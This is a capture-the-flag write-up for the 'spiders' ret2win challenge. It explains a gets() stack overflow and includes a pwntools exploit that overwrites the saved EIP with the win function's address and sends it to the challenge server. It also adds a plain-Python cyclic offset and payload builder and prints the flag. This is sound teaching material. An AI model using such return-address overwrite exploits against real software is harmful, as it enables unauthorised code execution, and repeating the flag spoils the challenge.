Debugging Spiders
ret2win
Problem
Solution
A basic file check and checksec reveal that the binary is a 32-bit ELF, dynamically linked and not stripped, with only NX and partial RELRO enabled. Since no stack canary or PIE is listed, a return address overwrite is not detected and the binary is loaded at a fixed address, which is why a hard-coded function address works below.

Looking at the decompiled main function, it calls gets(), which does not bound how many bytes it reads into the destination buffer. So a stack buffer overflow is possible here.

We also notice a function that is never called, named secret_spider(). Looking at it, it is clearly the win function.

Next we use gdb-pwndbg's cyclic tool to determine the offset to the saved EIP, which turns out to be 64 bytes. The following script gets the flag; run it with python solve.py REMOTE to run it against the server.
#!/usr/bin/env python3
from pwn import *

# =========================================================
# SETUP
# =========================================================
exe = './spiders'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'

host = '34.124.192.13'
port = 27302

def start(argv=[], *a, **kw):
    if args.GDB:        # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:   # ('server', 'port')
        return remote(host, port, *a, **kw)
    else:               # Run locally
        return process([exe] + argv, *a, **kw)

gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

io = start()

# =========================================================
# ADDRESSES
# =========================================================
win = 0x080491a6   # address of secret_spider(), the win function

# =========================================================
# EXPLOITS
# =========================================================
# Got manually through cyclic gdb-pwndbg
offset = 64

# 64 bytes of padding, then the win address overwrites the saved EIP
payload = flat({
    offset: [
        win
    ]
})

# sending payload
io.sendline(payload)
io.interactive()
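As an added example, not part of the original writeup, the offset computation and payload layout that the script above relies on, in plain Python without pwntools. It re-implements the de Bruijn pattern that pwndbg's cyclic uses, maps a crashed EIP value back to its offset, and checks that the payload has no byte gets() would stop on. The crashed EIP value 0x61616171 is constructed to match a 64-byte offset; the win address 0x080491a6 is the one from the writeup.

```python
import itertools
import string
import struct

# Added example (not the original writeup's code): a minimal re-implementation
# of the de Bruijn "cyclic" pattern that pwndbg/pwntools use, so the offset
# found in gdb can be reproduced and checked offline.

def de_bruijn(alphabet: str = string.ascii_lowercase, n: int = 4):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` one char at a time.
    Every n-character window occurs exactly once, which is what makes the
    value that lands in EIP map back to a unique offset."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (same output as pwntools' cyclic())."""
    return "".join(itertools.islice(de_bruijn(n=n), length)).encode()


def find_offset(eip: int, max_len: int = 4096, n: int = 4) -> int:
    """Map the 32-bit value that ended up in EIP back to its offset in the
    pattern, i.e. the number of bytes between the start of the buffer and the
    saved return address. Returns -1 if the value is not part of the pattern."""
    needle = struct.pack("<I", eip)          # little-endian, as on x86
    return cyclic(max_len, n=n).find(needle)


def build_payload(offset: int, win_addr: int, filler: bytes = b"A") -> bytes:
    """`offset` bytes of padding followed by the win address, little-endian,
    so that main's `ret` pops it into EIP."""
    return filler * offset + struct.pack("<I", win_addr)


def survives_gets(payload: bytes) -> bool:
    """gets() stops reading at a newline, so a payload containing 0x0a would be
    truncated before the return address is fully written. NUL bytes are fine
    for gets(), unlike strcpy()-style sinks."""
    return b"\n" not in payload


if __name__ == "__main__":
    # Constructed for the example: the EIP value gdb would report after
    # sending cyclic(100) to a binary whose saved EIP sits 64 bytes in.
    crashed_eip = 0x61616171  # b"qaaa" read as little-endian
    offset = find_offset(crashed_eip)
    payload = build_payload(offset, 0x080491a6)  # secret_spider() address from the writeup
    print(f"offset = {offset}")
    print(f"payload ({len(payload)} bytes) = {payload!r}")
    print(f"gets()-safe: {survives_gets(payload)}")
```

The 4-byte window is what makes the offset unique: with n=4 every 4-character sequence appears once in the pattern, so the value that lands in EIP identifies exactly one position. The final payload is the same 68 bytes the pwntools flat() call produces, 64 bytes of padding followed by the little-endian address.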
Flag
FindITCTF{Ju57_7h3_W4y_1t_iz}